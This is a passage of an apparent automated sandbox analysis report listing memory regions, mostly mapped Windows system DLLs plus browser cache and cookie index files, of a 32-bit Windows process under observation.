"\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 349 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 350 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 351 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 352 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 353 start_va = 0x380000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 354 start_va = 0x76970000 end_va = 0x76a5ffff monitored = 0 entry_point = 0x76980569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 355 start_va = 0x74a50000 end_va = 0x74aaffff monitored = 0 entry_point = 0x74a6a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 356 start_va = 0x75410000 end_va = 0x754bbfff monitored = 0 entry_point = 0x7541a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 357 start_va = 0x74a40000 end_va = 0x74a4bfff monitored = 0 entry_point = 0x74a410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 358 start_va = 0x759a0000 end_va = 0x759b8fff monitored = 0 entry_point = 0x759a4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 359 start_va = 0x749f0000 end_va = 0x74a01fff monitored = 0 entry_point = 0x749f1200 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 360 start_va = 0x755b0000 end_va = 0x756a4fff monitored = 0 entry_point = 0x755b1865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 361 start_va = 0x751c0000 end_va = 0x75216fff monitored = 0 entry_point = 0x751d9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 362 start_va = 0x75220000 end_va = 0x752affff monitored = 0 entry_point = 0x75236343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 363 start_va = 0x76860000 end_va = 0x7695ffff monitored = 0 entry_point = 0x7687b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 364 start_va = 0x76a60000 end_va = 0x76afffff monitored = 0 entry_point = 0x76a749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 365 start_va = 0x759c0000 end_va = 0x759c9fff monitored = 0 entry_point = 0x759c36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 366 start_va = 0x74d40000 end_va = 0x74ddcfff monitored = 0 entry_point = 0x74d73fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 367 start_va = 0x74de0000 end_va = 0x74f15fff monitored = 0 entry_point = 0x74de1b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 368 start_va = 0x75740000 end_va = 0x7589bfff monitored = 0 entry_point = 0x7578ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 369 start_va = 0x75130000 end_va = 0x751befff monitored = 0 entry_point = 0x75133fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 370 start_va = 0x74ab0000 end_va = 0x74bd0fff monitored = 0 entry_point = 0x74ab158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 371 start_va = 0x76ed0000 end_va = 0x76edbfff monitored = 0 entry_point = 0x76ed238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 372 start_va = 0x74f30000 end_va = 0x7512afff monitored = 0 entry_point = 0x74f322d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 373 start_va = 0x749b0000 end_va = 0x749e1fff monitored = 0 entry_point = 0x749b37f1 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\SysWOW64\\winmm.dll" (normalized: "c:\\windows\\syswow64\\winmm.dll") Region: id = 374 start_va = 0x75be0000 end_va = 0x76829fff monitored = 0 entry_point = 0x75c61601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 375 start_va = 0x74830000 end_va = 0x7484bfff monitored = 0 entry_point = 0x7483a431 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 376 start_va = 0x76960000 end_va = 0x76965fff monitored = 0 entry_point = 0x76961782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 377 start_va = 0x74820000 end_va = 0x74826fff monitored = 0 entry_point = 0x7482128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 378 start_va = 0x75960000 end_va = 0x75994fff monitored = 0 entry_point = 0x7596145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 379 start_va = 0x74850000 end_va = 0x74893fff monitored = 0 entry_point = 0x748663f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 380 start_va = 0x210000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 381 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 382 start_va = 0x540000 end_va = 0x6c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 383 start_va = 0x720000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 384 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 385 start_va = 0x75550000 end_va = 0x755affff monitored = 0 entry_point = 0x7556158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 386 start_va = 0x74c40000 end_va = 0x74d0bfff monitored = 0 entry_point = 0x74c4168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 387 start_va = 0x820000 end_va = 0x9a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 388 start_va = 0x9b0000 end_va = 0x1daffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 389 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 390 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 391 start_va = 0x210000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 392 start_va = 0x330000 end_va = 0x33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 393 start_va = 0x210000 end_va = 0x211fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 394 start_va = 0x220000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 395 start_va = 0x73a90000 end_va = 0x73c2dfff monitored = 0 entry_point = 0x73abe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 396 start_va = 0x260000 end_va = 0x260fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 397 start_va = 0x270000 end_va = 0x271fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 398 start_va = 0x1db0000 end_va = 0x207efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 399 start_va = 0x260000 end_va = 0x260fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 400 start_va = 0x748d0000 end_va = 0x748dafff monitored = 0 entry_point = 0x748d1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 401 start_va = 0x280000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 402 start_va = 0x290000 end_va = 0x297fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 403 start_va = 0x2a0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 404 start_va = 0x74f20000 end_va = 0x74f22fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\SysWOW64\\normaliz.dll" (normalized: "c:\\windows\\syswow64\\normaliz.dll") Region: id = 405 start_va = 0x2b0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 406 start_va = 0x2080000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 407 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 408 start_va = 0x73950000 end_va = 0x739a1fff monitored = 0 entry_point = 0x739514be region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\SysWOW64\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll") Region: id = 409 start_va = 0x73930000 end_va = 0x73944fff monitored = 0 entry_point = 0x739312de region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\SysWOW64\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll") Region: id = 410 start_va = 0x73920000 end_va = 0x7392cfff monitored = 0 entry_point = 0x73921326 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\SysWOW64\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll") Region: id = 411 start_va = 0x2f0000 end_va = 0x2f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 412 start_va = 0x2f0000 end_va = 0x2f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 413 start_va = 0x340000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 414 start_va = 0x6d0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 415 start_va = 0x2180000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 416 start_va = 0x2280000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 417 start_va = 0x73910000 end_va = 0x73915fff monitored = 0 entry_point = 0x7391125a region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\SysWOW64\\SensApi.dll" (normalized: "c:\\windows\\syswow64\\sensapi.dll") Region: id = 418 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 419 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 420 start_va = 0x2380000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 421 start_va = 0x23c0000 end_va = 0x24bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 422 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 423 start_va = 0x24c0000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 424 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 425 start_va = 0x74a10000 end_va = 0x74a26fff monitored = 0 entry_point = 0x74a11c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 426 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 427 start_va = 0x76830000 end_va = 0x7685efff monitored = 0 entry_point = 0x76832a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 428 start_va = 0x74970000 end_va = 0x749aefff monitored = 0 entry_point = 0x74972351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 429 start_va = 0x73900000 end_va = 0x7390ffff monitored = 0 entry_point = 0x739038c1 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\SysWOW64\\nlaapi.dll" (normalized: "c:\\windows\\syswow64\\nlaapi.dll") Region: id = 430 start_va = 0x2600000 end_va = 0x26affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 431 start_va = 0x2600000 end_va = 0x266ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 432 start_va = 0x26a0000 end_va = 0x26affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 433 start_va = 0x26b0000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 434 start_va = 0x747b0000 end_va = 0x747b5fff monitored = 0 entry_point = 0x747b14b2 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 435 start_va = 0x300000 end_va = 0x300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 436 start_va = 0x26b0000 end_va = 0x27affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026b0000" filename = "" Region: id = 437 start_va = 0x748a0000 end_va = 0x748c0fff monitored = 0 entry_point = 0x748a145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 438 start_va = 0x75b90000 end_va = 0x75bd4fff monitored = 0 entry_point = 0x75b911e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 439 start_va = 0x733a0000 end_va = 0x733a8fff monitored = 0 entry_point = 0x733a1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 440 start_va = 0x310000 end_va = 0x317fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 441 start_va = 0x2600000 end_va = 0x263ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 442 start_va = 0x2660000 end_va = 0x266ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 443 start_va = 0x747e0000 end_va = 0x7481bfff monitored = 0 entry_point = 0x747e145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 444 start_va = 0x27b0000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 445 start_va = 0x747d0000 end_va = 0x747d4fff monitored = 0 entry_point = 0x747d15df region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\SysWOW64\\WSHTCPIP.DLL" (normalized: "c:\\windows\\syswow64\\wshtcpip.dll") Region: id = 446 start_va = 0x747c0000 end_va = 0x747c5fff monitored = 0 entry_point = 0x747c1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\SysWOW64\\wship6.dll" (normalized: "c:\\windows\\syswow64\\wship6.dll") Region: id = 447 start_va = 0x739d0000 end_va = 0x73a07fff monitored = 0 entry_point = 0x739d990e region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 448 start_va = 0x2800000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 449 start_va = 0x2800000 end_va = 0x283ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 450 start_va = 0x2840000 end_va = 0x293ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 451 start_va = 0x2960000 end_va = 0x299ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 452 start_va = 0x738a0000 end_va = 0x738b6fff monitored = 0 entry_point = 0x738a3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 453 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 454 start_va = 0x320000 end_va = 0x320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 455 start_va = 0x74960000 end_va = 0x74967fff monitored = 0 entry_point = 0x749634d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\SysWOW64\\credssp.dll" (normalized: "c:\\windows\\syswow64\\credssp.dll") Region: id = 456 start_va = 0x320000 end_va = 0x321fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 457 start_va = 0x74950000 end_va = 0x74957fff monitored = 0 entry_point = 0x749510e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 458 start_va = 0x71ea0000 end_va = 0x71ed7fff monitored = 0 entry_point = 0x71ea1489 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 459 start_va = 0x74930000 end_va = 0x74946fff monitored = 0 entry_point = 0x749335fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 460 start_va = 0x71e60000 end_va = 0x71e9cfff monitored = 0 entry_point = 0x71e610f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 461 start_va = 0x738a0000 end_va = 0x738b6fff monitored = 0 entry_point = 0x738a3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 462 start_va = 0x29a0000 end_va = 0x29dbfff monitored = 0 entry_point = 0x29a128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 463 start_va = 0x29a0000 end_va = 0x29dbfff monitored = 0 entry_point = 0x29a128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 464 start_va = 0x29a0000 end_va = 0x29dbfff monitored = 0 entry_point = 0x29a128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 465 start_va = 0x29a0000 end_va = 0x29dbfff monitored = 0 entry_point = 0x29a128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 466 start_va = 0x29a0000 end_va = 0x29dbfff monitored = 0 entry_point = 0x29a128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 467 start_va = 0x73860000 end_va = 0x7389afff monitored = 0 entry_point = 0x7386128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 468 start_va = 0x29a0000 end_va = 0x2a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 469 start_va = 0x71e40000 end_va = 0x71e55fff monitored = 0 entry_point = 0x71e42061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\SysWOW64\\gpapi.dll" (normalized: "c:\\windows\\syswow64\\gpapi.dll") Region: id = 833 start_va = 0x320000 end_va = 0x329fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 834 start_va = 0x75950000 end_va = 0x75954fff monitored = 0 entry_point = 0x75951438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 835 start_va = 0x2aa0000 end_va = 0x2c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 884 start_va = 0x73a10000 end_va = 0x73a8ffff monitored = 0 entry_point = 0x73a237c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 885 start_va = 0x2ca0000 end_va = 0x2e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 886 start_va = 0x2ca0000 end_va = 0x2d7efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ca0000" filename = "" Region: id = 887 start_va = 0x2de0000 end_va = 0x2e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002de0000" filename = "" Region: id = 888 start_va = 0x710000 end_va = 0x710fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 889 start_va = 0x754c0000 end_va = 0x75542fff monitored = 0 entry_point = 0x754c23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 890 start_va = 0x2640000 end_va = 0x2640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002640000" filename = "" Region: id = 891 start_va = 0x71dc0000 end_va = 0x71e3cfff monitored = 0 entry_point = 0x71dc166a region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\SysWOW64\\taskschd.dll" (normalized: "c:\\windows\\syswow64\\taskschd.dll") Region: id = 892 start_va = 0x2650000 end_va = 0x2650fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 893 start_va = 0x2670000 end_va = 0x2676fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 894 start_va = 0x2650000 end_va = 0x2650fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 895 start_va = 0x2670000 end_va = 0x2676fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 896 start_va = 0x732e0000 end_va = 0x7330efff monitored = 0 entry_point = 0x732e1142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 897 start_va = 0x2d80000 end_va = 0x2dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 898 start_va = 0x2e20000 end_va = 0x2f1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 899 start_va = 0x736e0000 end_va = 0x737d4fff monitored = 0 entry_point = 